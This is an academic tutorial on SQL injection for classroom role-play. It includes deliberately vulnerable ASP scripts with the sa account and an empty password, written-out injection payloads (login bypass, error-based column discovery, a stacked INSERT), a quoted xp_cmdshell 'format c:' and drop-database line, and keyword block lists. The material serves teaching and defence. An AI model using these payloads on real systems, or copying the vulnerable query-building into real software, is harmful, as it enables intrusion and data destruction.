Tutorial on SQL Injection Attacks
Nicole Duff and Huiming Yu
Department of Computer Science
North Carolina A&T State University
1. Introduction
Structured Query Language (SQL) is a computer language designed to interact with relational
databases. The most common form of operation is a query, which is a collection of statements
that usually return a single 'result set'. SQL statements have the ability to modify the structure of
databases and manipulate the contents of those databases [1, 3, 4, 6]. This can jeopardize the
integrity of a system.
A standard SQL query is composed of one or more SQL commands, such as SELECT,
UPDATE, or INSERT. SQL injection is one of the most common application layer attacks.
According to NIST, SQL injection accounted for 14% of the total web application vulnerabilities
in 2006 [2]. SQL injection is the act of passing a SQL query or command as input into a web
application. It exploits web applications that use client-side data in a SQL query without proper
input validation. SQL injection attacks usually target data residing in a database.
2. SQL Injection Attacks
A SQL injection attack occurs on database-driven websites when unauthorized SQL queries are
executed on vulnerable sites. This attack can bypass a firewall and can compromise a fully patched
system. For this to happen, port 80, the default web port, is the only thing required. SQL
injection attacks target a specific web application where the vulnerability of the relational
database is either known or discovered by the attacker. Figure 1 shows a SQL attack
methodology [4].
Figure 1: Attack Methodology
In this example, students will be divided into individual groups and will then proceed to
assign roles. Some students will play the role of the web application developer and others
will play the role of the attacker. The developers will create an application that includes a
relational database. The attackers will try to hack the application. This case study uses the
examples developed by Mitchell Harper to allow students to gain hands-on experience [3].
2.1 Create an HTML form
In this section, how to create a simple login form called frmLogin will be described.

Username:
Password:

When this form is submitted, the username and password are passed to the login.asp script. They
are available to the script through the Request.Form collection. A user will be authenticated by
providing the correct user name and password. The login process is done by building a SQL query
and comparing the user name and password to the login records in the database.
Let us write the login.asp script:
<%
dim userName, password, query
dim conn, rs
userName = Request.Form("userName")
password = Request.Form("password")
set conn = server.createObject("ADODB.Connection") ' connect to the database
set rs = server.createObject("ADODB.Recordset")
' query command: the form values are concatenated straight into the SQL text
query = "select count(*) from users where userName='" & userName & "' and userPass='" & password & "'"
conn.Open "Provider=SQLOLEDB; Data Source=(local); Initial Catalog=myDB; User Id=sa; Password="
rs.activeConnection = conn
rs.open query
if rs.fields(0).value > 0 then ' check login information: count(*) must find a matching record
    response.write "Logged In"
else
    response.write "Bad Credentials"
end if
%>
If the user name and password match a record in the database, "Logged In" will be displayed.
Otherwise, "Bad Credentials" will be displayed.
2.2. How a SQL Injection Works
In general, web applications use data read from a client to build SQL queries. This can lead
to vulnerabilities where an attacker can inject SQL queries to cause SQL injection attacks.
Several SQL injection attacks, such as manipulating the space of a query command, forcing
login and changing information in a database, will be discussed in this section.
* Create a database
Let us create a database myDB that includes user name and password information in a users table
with some dummy records:
create database myDB
go
use myDB
go
create table users
(
userId int identity(1,1) not null,
userName varchar(50) not null,
userPass varchar(20) not null
)
insert into users(userName, userPass) values('john', 'doe')
insert into users(userName, userPass) values('admin', 'wwz04ff')
insert into users(userName, userPass) values('fsmith', 'mypassword')
If a user tries to log in and provides the username john and password doe, the message
"Logged In" will be displayed. The query would look like:
select count(*) from users where userName='john' and userPass='doe'
* SQL Injection: Use the Space of a Query
A hacker can use the space of a query to create a SQL injection attack. For example,
change the userPass into ' or 1=1 -- to create a select command like this:
select count(*) from users where userName='john' and userPass='' or 1=1 --'
Therefore the query only checks for the username of john. Instead of checking for a matching
password, it checks for an empty password, or the condition 1=1. In this case, if the
password field is empty or 1 equals 1 (which is always true), a valid row will be found in the
users table with username john. The single line delimiter (--) that comments out the final quote
stops ASP from returning an error about any open quotations. As the result one row will be
returned and the message "Logged In" will be displayed.
This method can also be used for the username field. If the username is changed to ' or 1=1 -- and
the password is empty, such as:
Username: ' or 1=1 --
Password: [Empty]
it injects a select query:
select count(*) from users where userName='' or 1=1 --' and userPass=''
A count of all rows in the users table will be returned. This is an example of a SQL injection attack
that is implemented by adding a command that uses the space of a query to get an undesired
result.
* SQL Injection: Force Login
The following example demonstrates how force-login SQL injection works. Consider the
following query that is based on the users table.
select userName from users where userName='' having 1=1
A page called login.asp can easily be developed to query the database by using these login
credentials:
Username: ' having 1=1 --
Password: [Anything]
When a user clicks on the submit button to start the login process, the SQL query causes ASP to
send the following error message to the browser:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'users.userName' is invalid in the select list because it is not contained in an aggregate
function and there is no GROUP BY clause.
/login.asp, line 16
This error message tells the unauthorized user the name of one field from the database:
users.userName. Using the name of this field, a user can use SQL Server's LIKE keyword to
log in with the following credentials:
Username: ' or users.userName like 'a%' --
Password: [Anything]
Once again, this gives an injected SQL query against the users table:
select userName from users where userName='' or
users.userName like 'a%' --' and userPass=''
When the users table was created, a user whose userName field was admin and userPass field
was wwz04ff was also created. Logging in with the username and password shown above uses
SQL's like keyword to get the username. The query grabs the userName field of the first row
whose userName field starts with a, which in this case is admin:
Logged In As admin
* SQL Injection: Change the Content of a Database
Let us create a products table and rows on the SQL server as follows:
create table products
(
id int identity(1,1) not null,
prodName varchar(50) not null
)
insert into products(prodName) values('Pink Hoola Hoop')
insert into products(prodName) values('Green Soccer Ball')
insert into products(prodName) values('Orange Rocking Chair')
Let us create a products.asp ASP script as follows:
<%
dim prodId, query
dim conn, rs
prodId = Request.QueryString("productId")
set conn = server.createObject("ADODB.Connection") ' connect to the database
set rs = server.createObject("ADODB.Recordset")
query = "select prodName from products where id = " & prodId ' select a product
conn.Open "Provider=SQLOLEDB; Data Source=(local); Initial Catalog=myDB; User Id=sa; Password="
rs.activeConnection = conn
rs.open query
if not rs.eof then
    response.write "Got product " & rs.fields("prodName").value
else
    response.write "No product found"
end if
%>
Visit products.asp in the browser with the following URL:
http://localhost/products.asp?productId=1
The following line of text is displayed in the browser:
Got product Pink Hoola Hoop
Notice that products.asp returns a field from the recordset based on the field's name:
response.write "Got product " & rs.fields("prodName").value
Although this may seem more secure, it is not. By manipulating the database a SQL injection can
occur because the WHERE clause of the query is based on a numerical value:
query = "select prodName from products where id = " & prodId
The products.asp page expects a numerical product Id passed as the productId querystring
variable.
Consider the following URL to products.asp:
http://localhost/products.asp?productId=0%20or%201=1
Each %20 in the URL represents a URL-encoded space character, so the URL looks like:
http://localhost/products.asp?productId=0 or 1=1
When used in conjunction with products.asp, the query looks like:
select prodName from products where id = 0 or 1=1
From the above select command we know how to use some URL-encoding, so the field names of the
products table can be pulled from it with the following URL:
http://localhost/products.asp?productId=0%20having%201=1
This would produce the following error in the browser:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'products.prodName' is invalid in the select list because it is not contained in an
aggregate function and there is no GROUP BY clause.
/products.asp, line 13
Take the name of the products field (products.prodName) and call up the following URL in the
browser:
http://localhost/products.asp?productId=0;insert%20into%20products(prodName)%20values(left(@@version,50))
Here is the query without the URL-encoded spaces:
http://localhost/products.asp?productId=0;insert into products(prodName) values(left(@@version,50))
It returns "No product found". However, it also runs an INSERT query on the products table,
adding the first 50 characters of SQL Server's @@version variable (which contains the details of
SQL Server's version, build, etc.) as a new record in the products table.
To get to the SQL server's version, a user must call up the products.asp page with the value of
the last entry in the products table, such as:
http://localhost/products.asp?productId=(select%20max(id)%20from%20products)
This query takes the ID of the last row added to the products table using SQL Server's MAX
function. The output is the new row that contains the SQL server version details:
Got product Microsoft SQL Server 2000 - 8.00.534 (Intel X86)
This method of injection can be used to perform many tasks.
3. A Real World SQL Injection Attack
In May 2008 China and Taiwan were hit by a large SQL injection attack that inserted malware in
thousands of websites [5]. On May 13, the attack was detected as originating from a server in
China. The attackers made no effort to hide the source IP address. Many victim websites
were closed because they sustained many permanent changes from the SQL injection attacks.
Thousands of websites were hit and most of them were in China.
The attackers used automated queries to Google's search engine to identify websites
vulnerable to the attack. The attack uses SQL injection to infect websites with malware,
which exploits vulnerabilities in the browsers of those who visit the sites. The malware came
from 1,000 different servers and targeted 10 vulnerabilities in Internet Explorer and associated plugins that are widespread in Asia [5]. The Mackay Memorial Hospital had a screenshot that shows that
its site had been compromised and displayed the SQL code injected by the attack.
The web sites of large companies such as SouFun.com and Mycar168.com in China have been
affected.
The impact was on a large scale. There were thousands of victim websites that had no service.
Many individuals had to find other ways to do their business.
4. Preventing SQL Injection Attacks
If a software developer designs scripts and applications with security considerations, most SQL
injection attacks can be avoided. In the following section, several methods that software
developers can use to reduce web applications' vulnerability to SQL injection attacks will be
discussed [3].
Method 1: Limit User Access
The default system account for SQL Server 2000 should never be used because of its unrestricted
nature. Setting up accounts for specific purposes is always a good idea. For example, if a
database allows users to view and order products, then the administrator must set up an account called
webUser_public that has SELECT rights on the products table, and INSERT rights only on the
orders table.
If a user does not make use of extended stored procedures, or has unused triggers, stored
procedures, user-defined functions, etc., then remove them, or move them to an isolated server.
SQL injection attacks make use of extended stored procedures such as xp_cmdshell and
xp_grantlogin. Removing them can stop the attack before it occurs.
Method 2: Escape Quotes
SQL injection attacks exploit the use of single quotes to delimit an expression. The chance of
a SQL injection attack can be reduced by using a simple replace function and converting all
single quotes to two single quotes. Using ASP to create a generic replace function will handle the
single quotes automatically. See the following example:
<%
function stripQuotes(strWords)
    ' double every single quote so it is read as a literal quote, not a delimiter
    stripQuotes = replace(strWords, "'", "''")
end function
%>
If the stripQuotes function is used in conjunction with the first query, then it will change from
the following select query:
select count(*) from users where userName='john' and
userPass='' or 1=1 --'
into the following select query:
select count(*) from users where userName='john' and
userPass=''' or 1=1 --'
This can stop the SQL injection attack because the clause of the WHERE query now requires
both the userName and userPass fields to be valid.
Method 3: Remove Culprit Characters/Character Sequences
Certain characters and character sequences such as ; , --, select, insert and xp_ can be used to
perform a SQL injection attack. Removing these characters and character sequences from user
input can reduce the chance of an injection attack occurring.
The following code demonstrates a basic function that can handle all of this:
<%
function killChars(strWords)
    dim badChars
    dim newChars
    dim i
    ' tokens deleted from the input; note that Replace is case-sensitive by default
    badChars = array("select", "drop", ";", "--", "insert", "delete", "xp_")
    newChars = strWords
    for i = 0 to uBound(badChars)
        newChars = replace(newChars, badChars(i), "")
    next
    killChars = newChars
end function
%>
Using stripQuotes in conjunction with killChars greatly reduces the chance of any SQL
injection attack succeeding. Look at the select query in the following:
select prodName from products where id=1; xp_cmdshell 'format
c: /q /yes '; drop database myDB; --
Run through stripQuotes and then killChars, it would end up looking like this:
prodName from products where id=1 cmdshell ''format c:
/q /yes '' database myDB
As a result it will return no records from the query.
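The following Python script is an added example, not code from this paper or from Harper's article: it rebuilds the login.asp and products.asp query construction against an in-memory SQLite stand-in for myDB (same dummy records, SQLite in place of SQL Server 2000) and runs the paper's stripQuotes and killChars methods on the inputs from section 2.2. It also adds a parameterised query, which the paper does not discuss, to show where the two methods stop: stripQuotes neutralises the quoted login payload but cannot touch the unquoted numeric productId case, and killChars passes 0 or 1=1 through unchanged because or is not in its list.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the paper's myDB (SQLite, not SQL Server)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table users(userId integer primary key, userName text, userPass text);
        insert into users(userName, userPass) values('john', 'doe');
        insert into users(userName, userPass) values('admin', 'wwz04ff');
        insert into users(userName, userPass) values('fsmith', 'mypassword');
        create table products(id integer primary key, prodName text);
        insert into products(prodName) values('Pink Hoola Hoop');
        insert into products(prodName) values('Green Soccer Ball');
        insert into products(prodName) values('Orange Rocking Chair');
    """)
    return db

def strip_quotes(s):
    """Method 2 (stripQuotes): double every single quote."""
    return s.replace("'", "''")

def kill_chars(s):
    """Method 3 (killChars): delete the listed tokens; 'or' is not on the list."""
    for bad in ("select", "drop", ";", "--", "insert", "delete", "xp_"):
        s = s.replace(bad, "")
    return s

def login_concat(db, user, pw):
    """login.asp as written: count(*) with the inputs concatenated into the SQL."""
    q = ("select count(*) from users where userName='" + user
         + "' and userPass='" + pw + "'")
    return db.execute(q).fetchone()[0]

def login_param(db, user, pw):
    """Same check with bound parameters: inputs are data, never SQL text."""
    q = "select count(*) from users where userName=? and userPass=?"
    return db.execute(q, (user, pw)).fetchone()[0]

def products_concat(db, prod_id):
    """products.asp as written: the id is concatenated with no quotes at all."""
    q = "select prodName from products where id = " + prod_id
    return [row[0] for row in db.execute(q)]

def products_param(db, prod_id):
    """Hardened: require an integer (ValueError otherwise), then bind it."""
    q = "select prodName from products where id = ?"
    return [row[0] for row in db.execute(q, (int(prod_id),))]

if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1 --"                                 # section 2.2 login payload
    print(login_concat(db, "john", payload))                # 3: every row matches
    print(login_concat(db, "john", strip_quotes(payload)))  # 0: quote is now literal
    print(login_param(db, "john", payload))                 # 0: bound parameter
    print(products_concat(db, kill_chars("0 or 1=1")))      # all three products
```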
5. Conclusion
SQL injection is one of the common application layer threats. It is the act of passing a SQL query or
command as input into a web application, and it exploits web applications that use client-side
data in a SQL query without proper input validation.
SQL injection is a topic taught in the computer science curriculum. The SQL injection attacks
case study material has been developed to help instructors teach SQL injection attacks and help
students learn the various SQL injection attacks as well as the ways to prevent these attacks. By
using exercises, students will gain hands-on experience of how SQL injection works and also ways
to combat it.
References
[1] Anley, C., "Advanced SQL Injection in SQL Server Applications", NGSSoftware Insight
Security Research (NISR) publication, 2002.
http://www.nextgenss.com/papers/advanced_sql_injection.pdf
[2] Dysart, F. and Sherriff, M., "Automated Fix Generator for SQL Injection Attacks", in
Proceedings of the 19th International Symposium on Software Reliability Engineering,
Charlottesville, 2008.
[3] Harper, M., "SQL Injection Attacks – Are You Safe?", http://www.sitepoint.com/print/794,
June 17, 2002.
[4] Indian Computer Emergency Response Team, "Case Study: Website Compromise and
Launch of Further Attacks by Exploiting SQL Injection Vulnerability". http://www.certin.org.in/knowledgebase/whitepapers/CICS-2008-02.pdf
[5] Lemon, S., "Mass SQL Injection Attack Hits Chinese Web Sites", 2008.
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9086658
[6] Wei, K., Muthuprasanna, M. and Kothari, S., "Preventing SQL Injection Attacks in Stored
Procedures", IEEE ASWEC, April 2006.
